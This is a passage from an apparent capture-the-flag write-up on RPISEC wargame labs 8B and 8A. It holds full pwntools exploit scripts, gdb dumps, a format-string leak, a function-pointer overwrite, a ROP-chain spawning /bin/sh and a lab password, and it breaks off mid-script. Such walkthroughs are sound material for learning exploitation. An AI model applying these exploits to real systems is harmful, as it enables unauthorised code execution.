Now printFunc<\/code> contains the value of v1.e + v2.e<\/code>:<\/p>\n
\r\n       v1        v2          v3\r\ne:   555555  +   1    =    555556 (0x87a24)\r\n\r\n--> printFunc: 0x87a24\r\n<\/pre>\n
Since this is a 4-byte value we can set printFunc<\/code> to an arbitrary address. In order to trigger a call to this address, we have to load our favorite vector in v1<\/code> or v2<\/code> and then print this vector:<\/p>\n
\r\n+------------------------------------------------------------+\r\n|                                                            |\r\n|  1. Enter data                                          :> |\r\n|  2. Sum vectors                                         :] |\r\n|  3. Print vector                                        :3 |\r\n|  4. Save sum to favorites                               8) |\r\n|  5. Print favorites                                     :O |\r\n|  6. Load favorite                                       :$ |\r\n|  9. Get help                                            :  |\r\n|                                                            |\r\n+------------------------------------------------------------+\r\nI COMMAND YOU TO ENTER YOUR COMMAND: 6\r\nWhich favorite? 4\r\nWhich vector? 1\r\n+------------------------------------------------------------+\r\n|                                                            |\r\n|  1. Enter data                                          :> |\r\n|  2. Sum vectors                                         :] |\r\n|  3. Print vector                                        :3 |\r\n|  4. Save sum to favorites                               8) |\r\n|  5. Print favorites                                     :O |\r\n|  6. Load favorite                                       :$ |\r\n|  9. Get help                                            :  |\r\n|                                                            |\r\n+------------------------------------------------------------+\r\nI COMMAND YOU TO ENTER YOUR COMMAND: 3\r\nWhich vector? 1\r\n\r\nProgram received signal SIGSEGV, Segmentation fault.\r\n[----------------------------------registers-----------------------------------]\r\nEAX: 0x87a24\r\nEBX: 0xb77e7fa8 --> 0x2eb0\r\nECX: 0xb77b38a4 --> 0x0\r\nEDX: 0xb77e8040 --> 0x87a24\r\nESI: 0x0\r\nEDI: 0x0\r\nEBP: 0xbf8fac88 --> 0x0\r\nESP: 0xbf8fac5c --> 0xb77e654c (<main+200>:     jmp    0xb77e657f <main+251>)\r\nEIP: 0x87a24\r\nEFLAGS: 0x10282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)\r\n[-------------------------------------code-------------------------------------]\r\nInvalid $PC address: 0x87a24\r\n[------------------------------------stack-------------------------------------]\r\n0000| 0xbf8fac5c --> 0xb77e654c (<main+200>:    jmp    0xb77e657f <main+251>)\r\n0004| 0xbf8fac60 --> 0xb77e8040 --> 0x87a24\r\n0008| 0xbf8fac64 --> 0xbf8fad24 --> 0xbf8fc8b4 ("\/levels\/lab08\/lab8B")\r\n0012| 0xbf8fac68 --> 0xbf8fad24 --> 0xbf8fc8b4 ("\/levels\/lab08\/lab8B")\r\n0016| 0xbf8fac6c --> 0x1\r\n0020| 0xbf8fac70 --> 0xb77b23c4 --> 0xb77b31e0 --> 0x0\r\n0024| 0xbf8fac74 --> 0x3300000d ('\\r')\r\n0028| 0xbf8fac78 --> 0xb77e8040 --> 0x87a24\r\n[------------------------------------------------------------------------------]\r\nLegend: code, data, rodata, value\r\nStopped reason: SIGSEGV\r\n0x00087a24 in ?? ()\r\n<\/pre>\n
Segmentation fault. Great!<\/p>\n
Summing it up we are now able to:
\n–> Leak the address of printf<\/code> and thus calculate the offset to any function we would like to call.
\n–> Control the instruction pointer.<\/p>\n
What function are we going to call? Well, the author of the program left us a little gift:<\/p>\n
\r\n\/*\r\n * Bonus points if you don't use this function.\r\n *\/\r\nvoid thisIsASecret()\r\n{\r\n        system("\/bin\/sh");\r\n}\r\n<\/pre>\n
The only thing we need to do is to calculate the offset of both functions:<\/p>\n
\r\ngdb-peda$ p printf\r\n$1 = {<text variable, no debug info>} 0xb7655280 <__printf>\r\ngdb-peda$ p thisIsASecret\r\n$2 = {<text variable, no debug info>} 0xb77e60a7 <thisIsASecret>\r\ngdb-peda$ p thisIsASecret - printf\r\n$3 = 0x190e27\r\n<\/pre>\n
Thus we have to add 0x190e27<\/code> to the leaked address of printf<\/code> to get the address of thisIsASecret<\/code>.<\/p>\n
The following python-script:
\n–> Leaks the address of printf<\/code>.
\n–> Uses this address to calculate the address of thisIsASecret<\/code> (adding 0x190e27<\/code>).
\n–> Stores the address of thisIsASecret<\/code> – 1 in v1.e<\/code>.
\n–> Stores the value 1 in v2.e<\/code> (zeros are not allowed!).
\n–> Summing up both vectors in v3<\/code>.
\n–> Chooses 4. Save sum to favorites<\/code> 5 times to overwrite printFunc<\/code> with the value of v3.e<\/code>.
\n–> Loads the 5th favorite in v1<\/code>.
\n–> Prints the vector v1<\/code> triggering the call to thisIsASecret<\/code>.<\/p>\n
\r\nlab8B@warzone:\/levels\/lab08$ cat \/tmp\/expl_lab8B.py\r\nfrom pwn import *\r\n\r\n#+++++++++++++++++++++++++\r\ndef enterData(p, v, data):\r\n  p.sendline("1") # 1. Enter data\r\n  p.sendline(str(v))   # vector\r\n  for i in range(len(data)):\r\n    p.sendline(str(data[i]))\r\n  p.recv(1000)\r\n\r\n#+++++++++++++++++\r\ndef sumVectors(p):\r\n  p.sendline("2") # 2. Sum vectors\r\n\r\n#++++++++++++++++++\r\ndef printVector(p, v):\r\n  p.sendline("3") # 3. Print vector\r\n  p.sendline(str(v))\r\n  return p.recv(1000)\r\n\r\n#+++++++++++++++++\r\ndef leakPrintf(p):\r\n  ret = printVector(p, 1)\r\n  addr = int(ret[0x33:0x37][::-1].encode("hex"), 16)\r\n  return addr\r\n\r\n#+++++++++++++++++++\r\ndef saveSumToFav(p):\r\n  p.sendline("4") # 4. Save sum to favorites\r\n  p.recv(1000)\r\n\r\n#+++++++++++++++++++++++++++\r\ndef loadFavorite(p, fav, v):\r\n  p.sendline("6") # 6. Load favorite\r\n  p.sendline(str(fav))\r\n  p.sendline(str(v))\r\n  p.recv(1000)\r\n\r\n\r\n\r\np = process(".\/lab8B")\r\np.recv(1000)\r\n\r\naddr_printf = leakPrintf(p)\r\nlog.info("printf addr: " + hex(addr_printf))\r\n\r\naddr_secret = addr_printf + 0x190e27\r\nlog.info("secret addr: " + hex(addr_secret))\r\n\r\nenterData(p, 1, [1, 1, 1, 1, addr_secret-1, 1, 1, 1, 1])\r\nenterData(p, 2, [1, 1, 1, 1, 1, 1, 1, 1, 1])\r\nsumVectors(p)\r\nfor i in range(5): saveSumToFav(p)\r\nloadFavorite(p, 4, 1)\r\nprintVector(p, 1)\r\n\r\np.interactive()\r\n<\/pre>\n
Running the script:<\/p>\n
\r\nlab8B@warzone:\/levels\/lab08$ python \/tmp\/expl_lab8B.py\r\n[+] Starting program '.\/lab8B': Done\r\n[*] printf addr: 0xb7622280\r\n[*] secret addr: 0xb77b30a7\r\n[*] Switching to interactive mode\r\n$ whoami\r\nlab8A\r\n$ cat \/home\/lab8A\/.pass\r\nTh@t_w@5_my_f@v0r1t3_ch@11\r\n<\/pre>\n
Done! The password for the next level is Th@t_w@5_my_f@v0r1t3_ch@11<\/code>.<\/p>\n
\n
lab8A<\/h1>\n
We connect to the last level using credentials lab8A<\/span> with the password Th@t_w@5_my_f@v0r1t3_ch@11<\/span>:<\/p>\n
\r\nlogin as: lab8A\r\nlab8A@localhost's password: (Th@t_w@5_my_f@v0r1t3_ch@11)\r\n        ____________________.___  _____________________________\r\n        \\______   \\______   \\   |\/   _____\/\\_   _____\/\\_   ___ \\\r\n         |       _\/|     ___\/   |\\_____  \\  |    __)_ \/    \\  \\\/\r\n         |    |   \\|    |   |   |\/        \\ |        \\\\     \\____\r\n         |____|_  \/|____|   |___\/_______  \/\/_______  \/ \\______  \/\r\n                \\\/                      \\\/         \\\/         \\\/\r\n __      __  _____ ____________________________    _______  ___________\r\n\/  \\    \/  \\\/  _  \\\\______   \\____    \/\\_____  \\   \\      \\ \\_   _____\/\r\n\\   \\\/\\\/   \/  \/_\\  \\|       _\/ \/     \/  \/   |   \\  \/   |   \\ |    __)_\r\n \\        \/    |    \\    |   \\\/     \/_ \/    |    \\\/    |    \\|        \\\r\n  \\__\/\\  \/\\____|__  \/____|_  \/_______ \\\\_______  \/\\____|__  \/_______  \/\r\n       \\\/         \\\/       \\\/        \\\/        \\\/         \\\/        \\\/\r\n\r\n        --------------------------------------------------------\r\n\r\n                       Challenges are in \/levels\r\n                   Passwords are in \/home\/lab*\/.pass\r\n            You can create files or work directories in \/tmp\r\n\r\n         -----------------[ contact@rpis.ec ]-----------------\r\n<\/pre>\n
Let’s have a look at the source code:<\/p>\n
\r\nlab8A@warzone:\/levels\/lab08$ cat lab8A.c\r\n#include <stdlib.h>\r\n#include <stdio.h>\r\n#include <string.h>\r\n#include "utils.h"\r\n#define STDIN 0\r\n\r\n\/\/gcc -static -fstack-protector-all -mpreferred-stack-boundary=2 -o lab8A lab8A.c\r\nint *global_addr;\r\nint *global_addr_check;\r\n\r\n\/\/ made so you can only read what we let you\r\n\r\nvoid selectABook() {\r\n    \/* Our Apologies,the interface is currently under developement *\/\r\n    char buf_secure[512];\r\n    scanf("%s", buf_secure);\r\n    printf(buf_secure);\r\n    if(strcmp(buf_secure, "A") == 0){\r\n        readA();\r\n    }else if(strcmp(buf_secure,"F") == 0){\r\n        readB();\r\n    }else if(*buf_secure == '\\x00'){\r\n        readC();\r\n    }else if(buf_secure == 1337){\r\n        printf("\\nhackers dont have time to read.\\n");\r\n        exit(EXIT_FAILURE);\r\n    }else{\r\n        printf("\\nWhat were you thinking, that isn't a good book.");\r\n        selectABook();\r\n    }\r\n    return;\r\n}\r\n\r\nvoid readA(){\r\n\r\n    printf("\\n\\n*************************************************\\n");\r\n    printf("{|} Aristote's Metaphysics 350 B.C. Book VIII {|}\\n");\r\n    printf("*************************************************\\n\\n");\r\n    printf("To return to the difficulty which has been stated with respect both to definitions and to numbers, what is the cause of their unity? In the case of all things which have several parts and in which the totality is not, as it were, a mere heap, but the whole is something beside the parts, there is a cause; for even in bodies contact is the cause of unity in some cases, and in others viscosity or some other such quality. And a definition is a set of words which is one not by being connected together, like the Iliad, but by dealing with one object.-What then, is it that makes man one; why is he one and not many, e.g. animal + biped, especially if there are, as some say, an animal-itself and a biped-itself? Why are not those Forms themselves the man, so that men would exist by participation not in man, nor in-one Form, but in two, animal and biped, and in general man would be not one but more than one thing, animal and biped? \\n");\r\n\r\n}\r\n\r\nvoid readB(){\r\n\r\n    printf("\\n\\n*************************************************\\n");\r\n    printf("{|} Aristote's Metaphysics 350 B.C. Book IVIZ {|}\\n");\r\n    printf("*************************************************\\n\\n");\r\n    printf(\r\n\r\n    "Clearly, then, if people proceed thus in their usual manner of definition and speech, they cannot explain and solve the difficulty. But if, as we say, one element is matter and another is form, and one is potentially and the other actually, the question will no longer be thought a difficulty. For this difficulty is the same as would arise if 'round bronze' were the definition of 'cloak'; for this word would be a sign of the definitory formula, so that the question is, what is the cause of the unity of 'round' and 'bronze'? The difficulty disappears, because the one is matter, the other form. What, then, causes this-that which was potentially to be actually-except, in the case of things which are generated, the agent? For there is no other cause of the potential sphere's becoming actually a sphere, but this was the essence of either. Of matter some is intelligible, some perceptible, and in a formula there is always an element of matter as well as one of actuality; e.g. the circle is 'a plane figure'. But of the things which have no matter, either intelligible or perceptible, each is by its nature essentially a kind of unity, as it is essentially a kind of being-individual substance, quality, or quantity (and so neither 'existent' nor 'one' is present in their definitions), and the essence of each of them is by its very nature a kind of unity as it is a kind of being-and so none of these has any reason outside itself, for being one, nor for being a kind of being; for each is by its nature a kind of being and a kind of unity, not as being in the genus 'being' or 'one' nor in the sense that being and unity can exist apart from particulars. \\n");\r\n\r\n}\r\n\r\nvoid readC(){\r\n\r\n    printf("\\n\\n*************************************************\\n");\r\n    printf("{|} Aristote's Metaphysics 350 B.C. Book MN9+ {|}\\n");\r\n    printf("*************************************************\\n\\n");\r\n   printf(\r\n    "Owing to the difficulty about unity some speak of 'participation', and raise the question, what is the cause of participation and what is it to participate; and others speak of 'communion', as Lycophron says knowledge is a communion of knowing with the soul; and others say life is a 'composition' or 'connexion' of soul with body. Yet the same account applies to all cases; for being healthy, too, will on this showing be either a 'communion' or a 'connexion' or a 'composition' of soul and health, and the fact that the bronze is a triangle will be a 'composition' of bronze and triangle, and the fact that a thing is white will be a 'composition' of surface and whiteness. The reason is that people look for a unifying formula, and a difference, between potency and complete reality. But, as has been said, the proximate matter and the form are one and the same thing, the one potentially, and the other actually. Therefore it is like asking what in general is the cause of unity and of a thing's being one; for each thing is a unity, and the potential and the actual are somehow one. Therefore there is no other cause here unless there is something which caused the movement from potency into actuality. And all things which have no matter are without qualification essentially unities. ");\r\n\r\n\r\n}\r\n\r\nvoid findSomeWords() {\r\n    \/* We specialize in words of wisdom *\/\r\n    char buf[24];\r\n    \/\/ to avoid the null\r\n    global_addr = (&buf+0x1);\r\n    \/\/ have to make sure no one is stealing the librarians cookies (they get angry)\r\n    global_addr_check = global_addr-0x2;\r\n    char lolz[4];\r\n\r\n    printf("\\n..I like to read ^_^ <==  ");\r\n    read(STDIN, buf, 2048); \/\/ >> read a lot every day !\r\n\r\n    if(((*( global_addr))^(*(global_addr_check))) != ((*( global_addr))^(0xdeadbeef))){\r\n        printf("\\n\\nWoah There\\n");\r\n        \/\/ why are you trying to break my program q-q\r\n        exit(EXIT_FAILURE);\r\n    }\r\n\r\n    \/\/ protected by my CUSTOM cookie - so soooo safe now\r\n    return;\r\n}\r\n\r\nint main(int argc, char* argv[]) {\r\n\r\n    disable_buffering(stdout);\r\n    printf("\\n\\n\\n");\r\n    printf("**********************************************\\n"\\\r\n           "{|}  Welcome to QUEND's Beta-Book-Browser  {|}\\n"\\\r\n           "**********************************************\\n"\\\r\n           "\\n"\r\n           "\\t==> reading is for everyone <==\\n"\\\r\n           "\\t[+] Enter Your Favorite Author's Last Name: ");\r\n    selectABook();\r\n\r\n    printf("\\n...please turn to page 394...\\n");\r\n    findSomeWords();\r\n\r\n    printf("\\n\\t[===] Whew you made it !\\n\\n");\r\n    return EXIT_SUCCESS;\r\n}\r\n<\/pre>\n
What does the program do?
\n–> The binary is linked statically (gcc option -static<\/code> on line 7).
\n–> On lines 8-9 two global integer pointers are defined: global_addr<\/code> and global_addr_check<\/code>.
\n–> Within the main<\/code> function a welcome message is printed and the function selectABook<\/code> is called (line 97).
\n–> This function (line 13) defines a local buffer buf_secure<\/code> (line 15) which is filled with user input using scanf<\/code> (line 16).
\n–> This buffer is printed using printf<\/code> (line 17) and then compared to different strings \/ constants (\"A\"<\/code>, \"B\"<\/code>, '\\x00'<\/code>, 1337<\/code>).
\n–> Depending on the result of the comparison readA<\/code>, readB<\/code> or readC<\/code> is called. If buf_secure<\/code> is equal to 1337<\/code> the program is quit by calling exit<\/code>.
\n–> If none of the comparisons succeeded, the function selectABook<\/code> is called recursively (line 29).
\n–> The three functions readA<\/code>, readB<\/code> and readC<\/code> merely print some output.
\n–> After the call to selectABook<\/code> within the main<\/code> function there is another call to findSomeWords<\/code> (line 100).
\n–> This function (line 65) defines a local buffer buf<\/code> (line 67) and sets the global_addr<\/code> pointer to the address right after the buffer: (&buf+0x1 = buf+24<\/code>) (line 69).
\n–> The other pointer global_addr_check<\/code> is set to the value of global_addr-0x2<\/code> (line 71), which equals the address of buf+16<\/code> since both pointers are 4 byte integers (24 - 8 = 16<\/code>).
\n–> On line 75 read<\/code> is called to read a maximum amount of 2048 bytes into buf<\/code>.
\n–> After this (lines 77-81) follows a custom stack cookie<\/i> implementation. The values which each pointer is referencing are XORed and compared the (*(global_addr))^(0xdeadbeef)<\/code>.
\n–> If the comparison fails, exit<\/code> is called to quit the program. In this case the return<\/code> instruction at the end of the function is never reached.<\/p>\n
Just like lab6B and lab7A there is an additional readme file:<\/p>\n
\r\nlab8A@warzone:\/levels\/lab08$ cat lab8A.readme\r\nlab8A is a remote level much like lab6B. It is running on port 8841.\r\n\r\nnc wargame.server.example 8841 -vvv\r\n<\/pre>\n
Where is the vulnerability within the program?<\/p>\n
There are two obvious vulnerabilities in the program. The first one within selectABook<\/code>:<\/p>\n
\r\n    char buf_secure[512];\r\n    scanf("%s", buf_secure);\r\n    printf(buf_secure);\r\n<\/pre>\n
The buffer buf_secure<\/code> contains user input and is used as the first argument to printf<\/code>. Since this is the format string, the user can enter format specifiers to leak information and also to write arbitrary data to an arbitrary address as we have seen in lab04<\/a>.<\/p>\n
The second vulnerability resides within the function findSomeWords<\/code>:<\/p>\n
\r\n    char buf[24];\r\n<\/pre>\n
\r\n    read(STDIN, buf, 2048); \/\/ >> read a lot every day !\r\n<\/pre>\n
The buffer buf<\/code> is only 24 bytes long, but a maximum amount of 2048 are read into it. This is a classical buffer overflow like in lab02<\/a>.<\/p>\n
Since the subject of this lab is Misc and Stack Cookies<\/i> our final intend should be to exploit the buffer overflow vulnerability and bypass the stack canary protection. Nevertheless I decided to focus on the format string vulnerability at first. It should be possible to exploit this vulnerability without even using the second vulnerability.<\/p>\n
We already know that we can leverage a format string vulnerability to write arbitrary data to an arbitrary address. Since we ultimately want to get a shell, the first thing we need to do is to control the instruction pointer. We can do this by overwriting the return address of the function selectABook<\/code>. The only thing we have to consider is that we need to enter a valid input triggering readA<\/code>, readB<\/code> or readC<\/code> because otherwise the return<\/code> instruction at the end of the function is never reached. Since the function calls itself recursively if no valid input is entered, this should be no problem.<\/p>\n
In order to overwrite the return address, we have to know where the address is stored on the stack. Because ASLR is enabled, we do not know the address in advance. Thus we start by leaking a stack address:<\/p>\n
\r\nlab8A@warzone:\/levels\/lab08$ .\/lab8A\r\n\r\n\r\n\r\n**********************************************\r\n{|}  Welcome to QUEND's Beta-Book-Browser  {|}\r\n**********************************************\r\n\r\n        ==> reading is for everyone <==\r\n        [+] Enter Your Favorite Author's Last Name: %p\r\n0xbfb6f5a0\r\nWhat were you thinking, that isn't a good book.\r\n<\/pre>\n
That’s it. Since the first argument on the stack is a stack address, it suffices to enter %p<\/code> to leak this address. We could now calculate the offset to the return address we want to overwrite. But before we are doing this, we have to think about which address want to store in the instruction pointer.<\/p>\n
We have already figured out that the binary was linked statically. We can verify this using file<\/code> for example:<\/p>\n
\r\nlab8A@warzone:\/levels\/lab08$ file lab8A\r\nlab8A: ELF 32-bit LSB  executable, Intel 80386, version 1 (GNU\/Linux), statically linked, for GNU\/Linux 2.6.24, BuildID[sha1]=760ccd5bdb365cd6acbc1befc07e58fec83743a1, not stripped\r\n<\/pre>\n
Also NX<\/code> is enabled and we thus cannot store and execute a shellcode on the stack:<\/p>\n
\r\nlab8A@warzone:\/levels\/lab08$ checksec lab8A\r\nRELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      FORTIFY FORTIFIED FORTIFY-able  FILE\r\nPartial RELRO   Canary found      NX enabled    No PIE          No RPATH   No RUNPATH   Yes     2     41       lab8A\r\n<\/pre>\n
Unfortunately the binary does not contain system<\/code> or execve<\/code>. But a lot of function has been built-in statically resulting in a quite good amount of ROP-gadgets:<\/p>\n
\r\nlab8A@warzone:\/levels\/lab08$ ROPgadget --binary lab8A | wc -l\r\n11940\r\n<\/pre>\n
Thus we will build a ROP-chain which will call execve(\"\/bin\/sh\")<\/code> like we did in lab5B<\/a>.<\/p>\n
I ended up with the following ROP-gadgets using ROPgadget<\/code>:<\/p>\n
\r\n0x08054b45: mov edx, 0xffffffff; ret\r\n0x0807b8dc: inc edx; adc al,0x39; ret\r\n            --> EDX = 0\r\n\r\n0x08049c73: xor ecx, ecx; pop ebx; mov eax, ecx; pop esi; pop edi; pop ebp; ret\r\n;addr_binsh  -> ebx\r\n;0xdeadbeef  -> esi\r\n;0xdeadbeef  -> edi\r\n;0xdeadbeef  -> ebp\r\n            --> ECX = 0\r\n            --> EAX = 0\r\n            --> EBX = address of "\/bin\/sh"\r\n\r\n0x08069443: add eax, edi; pop edi; ret\r\n;0x2152411c  -> edi: 0xdeadbeef + 0x2152411c = 0x10000000b\r\n\r\n0x08069443: add eax, edi; pop edi; ret\r\n;0xdeadbeef  -> edi\r\n\r\n            --> EAX = 0xB\r\n\r\n0x08048ef6: int 0x80 ; execve("\/bin\/sh")\r\n<\/pre>\n
For our ROP-chain to work we need an address which references the string \"\/bin\/sh\"<\/code>. Since we have already leaked a stack address, we can simply store the string \/bin\/sh<\/code> in the buffer. The leaked stack address using the format specifier %p<\/code> is the address of the buffer itself. Thus we can append \/bin\/sh<\/code> and the string will be stored at leak+2<\/code>:<\/p>\n
\r\nlab8A@warzone:\/levels\/lab08$ gdb lab8A\r\nReading symbols from lab8A...(no debugging symbols found)...done.\r\ngdb-peda$ disassemble selectABook\r\nDump of assembler code for function selectABook:\r\n...\r\n   0x08048f3e <+51>:    call   0x804f4f0 <printf>\r\n   0x08048f43 <+56>:    mov    DWORD PTR [esp+0x4],0x80bf7ce\r\n...\r\nEnd of assembler dump.\r\ngdb-peda$ b *selectABook+56\r\nBreakpoint 1 at 0x8048f43\r\ngdb-peda$ r\r\nStarting program: \/levels\/lab08\/lab8A\r\n\r\n\r\n\r\n**********************************************\r\n{|}  Welcome to QUEND's Beta-Book-Browser  {|}\r\n**********************************************\r\n\r\n        ==> reading is for everyone <==\r\n        [+] Enter Your Favorite Author's Last Name: %p\/bin\/sh\r\n0xbffff4e0\/bin\/sh[----------------------------------registers-----------------------------------]\r\nEAX: 0x11\r\nEBX: 0x80481a8 (<_init>:        push   ebx)\r\nECX: 0xffffffff\r\nEDX: 0x80ed4d4 --> 0x0\r\nESI: 0x0\r\nEDI: 0x80ec00c --> 0x8068100 (<__stpcpy_sse2>:  mov    edx,DWORD PTR [esp+0x4])\r\nEBP: 0xbffff6e4 --> 0xbffff708 --> 0x8049990 (<__libc_csu_fini>:        push   ebx)\r\nESP: 0xbffff4d8 --> 0xbffff4e0 ("%p\/bin\/sh")\r\nEIP: 0x8048f43 (<selectABook+56>:       mov    DWORD PTR [esp+0x4],0x80bf7ce)\r\nEFLAGS: 0x296 (carry PARITY ADJUST zero SIGN trap INTERRUPT direction overflow)\r\n[-------------------------------------code-------------------------------------]\r\n   0x8048f35 <selectABook+42>:  lea    eax,[ebp-0x204]\r\n   0x8048f3b <selectABook+48>:  mov    DWORD PTR [esp],eax\r\n   0x8048f3e <selectABook+51>:  call   0x804f4f0 <printf>\r\n=> 0x8048f43 <selectABook+56>:  mov    DWORD PTR [esp+0x4],0x80bf7ce\r\n   0x8048f4b <selectABook+64>:  lea    eax,[ebp-0x204]\r\n   0x8048f51 <selectABook+70>:  mov    DWORD PTR [esp],eax\r\n   0x8048f54 <selectABook+73>:  call   0x8048280\r\n   0x8048f59 <selectABook+78>:  test   eax,eax\r\n[------------------------------------stack-------------------------------------]\r\n0000| 0xbffff4d8 --> 0xbffff4e0 ("%p\/bin\/sh")\r\n0004| 0xbffff4dc --> 0xbffff4e0 ("%p\/bin\/sh")\r\n0008| 0xbffff4e0 ("%p\/bin\/sh")\r\n0012| 0xbffff4e4 ("in\/sh")\r\n0016| 0xbffff4e8 --> 0x68 ('h')\r\n0020| 0xbffff4ec --> 0x0\r\n0024| 0xbffff4f0 --> 0x0\r\n0028| 0xbffff4f4 --> 0x0\r\n[------------------------------------------------------------------------------]\r\nLegend: code, data, rodata, value\r\n\r\nBreakpoint 1, 0x08048f43 in selectABook ()\r\ngdb-peda$ x\/s 0xbffff4e0 + 2\r\n0xbffff4e2:     "\/bin\/sh"\r\n<\/pre>\n
But how can we store all ROP-gadgets on the stack? With the format string vulnerability we can overwrite the 4 byte return address. Of course we could also write a little bit more data. But the whole ROP-chain? A more efficient way is to use a pivoting gadget like we did in lab5A<\/a>:
\n–> We store all our gadgets on the stack with the call to scanf<\/code> in selectABook<\/code>.
\n–> Since this is no valid user input, the function selectABook<\/code> gets called once again.
\n–> We calculate the offset from esp<\/code> to our ROP-chain when the ret<\/code> instruction of the last selectABook<\/code> call is reached.
\n–> We find a pivoting ROP-gadget which adds this offset to esp<\/code>.
\n–> We overwrite the return address of the last selectABook<\/code> call with the address of this pivoting ROP-gadget.<\/p>\n
Let’s start by determining the offset:<\/p>\n
\r\nlab8A@warzone:\/levels\/lab08$ gdb lab8A\r\nReading symbols from lab8A...(no debugging symbols found)...done.\r\ngdb-peda$ disassemble selectABook\r\nDump of assembler code for function selectABook:\r\n...\r\n   0x08048fdf <+212>:   leave\r\n   0x08048fe0 <+213>:   ret\r\nEnd of assembler dump.\r\ngdb-peda$ b *selectABook+213\r\nBreakpoint 1 at 0x8048fe0\r\ngdb-peda$ r\r\nStarting program: \/levels\/lab08\/lab8A\r\n\r\n\r\n\r\n**********************************************\r\n{|}  Welcome to QUEND's Beta-Book-Browser  {|}\r\n**********************************************\r\n\r\n        ==> reading is for everyone <==\r\n        [+] Enter Your Favorite Author's Last Name: AAAA\r\nAAAA\r\nWhat were you thinking, that isn't a good book.A\r\nA\r\n\r\n*************************************************\r\n{|} Aristote's Metaphysics 350 B.C. Book VIII {|}\r\n*************************************************\r\n\r\nTo return to the difficulty which has been stated with respect both to definitions and to numbers, what is the cause of their unity? In the case of all things which have several parts and in which the totality is not, as it were, a mere heap, but the whole is something beside the parts, there is a cause; for even in bodies contact is the cause of unity in some cases, and in others viscosity or some other such quality. And a definition is a set of words which is one not by being connected together, like the Iliad, but by dealing with one object.-What then, is it that makes man one; why is he one and not many, e.g. animal + biped, especially if there are, as some say, an animal-itself and a biped-itself? Why are not those Forms themselves the man, so that men would exist by participation not in man, nor in-one Form, but in two, animal and biped, and in general man would be not one but more than one thing, animal and biped?\r\n[----------------------------------registers-----------------------------------]\r\nEAX: 0x0\r\nEBX: 0x80481a8 (<_init>:        push   ebx)\r\nECX: 0x80ed4d4 --> 0x0\r\nEDX: 0x3a8\r\nESI: 0x0\r\nEDI: 0x80ec00c --> 0x8068100 (<__stpcpy_sse2>:  mov    edx,DWORD PTR [esp+0x4])\r\nEBP: 0xbffff6e4 --> 0xbffff708 --> 0x8049990 (<__libc_csu_fini>:        push   ebx)\r\nESP: 0xbffff4d4 --> 0x8048fcd (<selectABook+194>:       nop)\r\nEIP: 0x8048fe0 (<selectABook+213>:      ret)\r\nEFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)\r\n[-------------------------------------code-------------------------------------]\r\n   0x8048fd8 <selectABook+205>: je     0x8048fdf <selectABook+212>\r\n   0x8048fda <selectABook+207>: call   0x806f490 <__stack_chk_fail>\r\n   0x8048fdf <selectABook+212>: leave\r\n=> 0x8048fe0 <selectABook+213>: ret\r\n   0x8048fe1 <readA>:   push   ebp\r\n   0x8048fe2 <readA+1>: mov    ebp,esp\r\n   0x8048fe4 <readA+3>: sub    esp,0x8\r\n   0x8048fe7 <readA+6>: mov    eax,gs:0x14\r\n[------------------------------------stack-------------------------------------]\r\n0000| 0xbffff4d4 --> 0x8048fcd (<selectABook+194>:      nop)\r\n0004| 0xbffff4d8 --> 0x80bf7f8 ("\\nWhat were you thinking, that isn't a good book.")\r\n0008| 0xbffff4dc --> 0x80bf7d0 --> 0x46 ('F')\r\n0012| 0xbffff4e0 ("AAAA")\r\n0016| 0xbffff4e4 --> 0x0\r\n0020| 0xbffff4e8 --> 0x0\r\n0024| 0xbffff4ec --> 0x0\r\n0028| 0xbffff4f0 --> 0x0\r\n[------------------------------------------------------------------------------]\r\nLegend: code, data, rodata, value\r\n\r\nBreakpoint 1, 0x08048fe0 in selectABook ()\r\ngdb-peda$ p 0xbffff4e0 - 0xbffff4d4\r\n$1 = 0xc\r\n<\/pre>\n
The from the buffer buf_secure<\/code> of the first call to selectABook<\/code> to the return address of the second call is 0xc<\/code>.<\/p>\n
Because the ret<\/code> instruction itself already pops on item off the stack, we need to find a gadget, which will add 8<\/code> to esp<\/code>. Again I used ROPgadget<\/code> to find an appropriate gadget:<\/p>\n
\r\nlab8A@warzone:\/levels\/lab08$ ROPgadget --binary lab8A | grep "add esp"\r\n...\r\n0x080b4f89 : add esp, 4; pop ebp; ret\r\n...\r\n<\/pre>\n
Summing it up our exploit will do the following:
\n–> Leak a stack address and store \"\/bin\/sh\"<\/code> (first call to selectABook<\/code>).
\n–> Store our ROP-chain (second call to selectABook<\/code>).
\n–> Overwrite the return address of the second call with the pivoting gadget using the format string vulnerability (third call to selectABook<\/code>).
\n–> Enter some valid input to reach the ret<\/code> instruction (fourth call to selectABook<\/code>).<\/p>\n
The final python-script:<\/p>\n
\r\nlab8A@warzone:\/levels\/lab08$ cat \/tmp\/exploit_lab8A.py\r\nfrom pwn import *\r\n\r\np = remote("localhost", 8841)\r\n\r\n#+++++++++++++++++++++++++++++++++++++++++++++++++++++++++\r\n# first call to selectABook: leak stack + store "\/bin\/sh"\r\n\r\nfmt = "%p\/bin\/sh" # stack_leak + \/bin\/sh for later use\r\np.sendline(fmt)\r\nret = p.recv(1000)\r\nstack_leak = int(ret[0xe1:0xe9], 16)\r\nlog.success("stack_leak: " + hex(stack_leak))\r\naddr_binsh = stack_leak + 2\r\n\r\n#+++++++++++++++++++++++++++++++++++++++++++++++++++++++++\r\n# second call to selectABook: ROP-chain\r\n\r\nfmt  = p32(0x08054b45) # mov edx, 0xffffffff; ret\r\n\r\nfmt += p32(0x0807b8dc) # inc edx; adc al,0x39; ret\r\n\r\n                       # --> EDX = 0\r\n\r\nfmt += p32(0x08049c73) # xor ecx, ecx; pop ebx; mov eax, ecx;\r\n                       # pop esi; pop edi; pop ebp; ret\r\nfmt += p32(addr_binsh) #  -> ebx\r\nfmt += p32(0xdeadbeef) #  -> esi\r\nfmt += p32(0xdeadbeef) #  -> edi\r\nfmt += p32(0xdeadbeef) #  -> ebp\r\n\r\n                       # --> ECX = 0\r\n                       # --> EAX = 0\r\n                       # --> EBX = address of "\/bin\/sh"\r\n\r\nfmt += p32(0x08069443) # add eax, edi; pop edi; ret\r\nfmt += p32(0x2152411c) #  -> edi: 0xdeadbeef + 0x2152411c = 0x10000000b\r\n\r\nfmt += p32(0x08069443) # add eax, edi; pop edi; ret\r\nfmt += p32(0xdeadbeef) #  -> edi\r\n\r\n                       # --> EAX = 0xB\r\n\r\nfmt += p32(0x08048ef6) # int 